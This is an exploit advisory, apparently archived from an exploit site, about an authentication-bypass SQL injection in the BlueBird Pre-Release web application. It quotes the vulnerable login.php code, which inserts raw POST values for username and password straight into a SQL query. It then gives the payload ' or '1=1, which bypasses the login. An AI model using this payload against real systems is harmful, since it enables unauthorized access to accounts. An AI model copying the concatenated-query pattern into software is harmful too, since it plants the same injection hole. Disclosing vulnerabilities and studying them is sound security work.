id: 4838
date: 02/10/2009
title: BlueBird Pre-Release (Auth Bypass) SQL Injection Vulnerability
author: x0r
cves: 

==============================================================
BlueBird Pre-Release (Auth Bypass) SQL Injection Vulnerability
==============================================================


#########################################################################################
[0x01] Informations:

Name           : BlueBird Pre-Release
Download       : http://downloads.sourceforge.net/bluebird/bluebird_pre.zip
Vulnerability  : Auth Bypass
Author         : x0r
Notes          : Proud to be Italian
#########################################################################################
[0x02] Bug:

Bugged file is /[path]/login.php

[Code]
if ( $request == "POST" )
{
	$username = $_POST['username'];
	$passwd = $_POST['passwd'];
	
	// Call mysql class
	$db = new db;
	$db->connect();
	$sql = "SELECT * FROM bluebird_users WHERE username='$username' &&
password='$passwd' ";
	$check_query = $db->query($sql);
	$row = mysql_numrows($check_query);
[/code]

#########################################################################################
[0x03] Exploit:

Exploit: ' or '1=1

########################################################################################



#  0day.today [2023-03-23]  #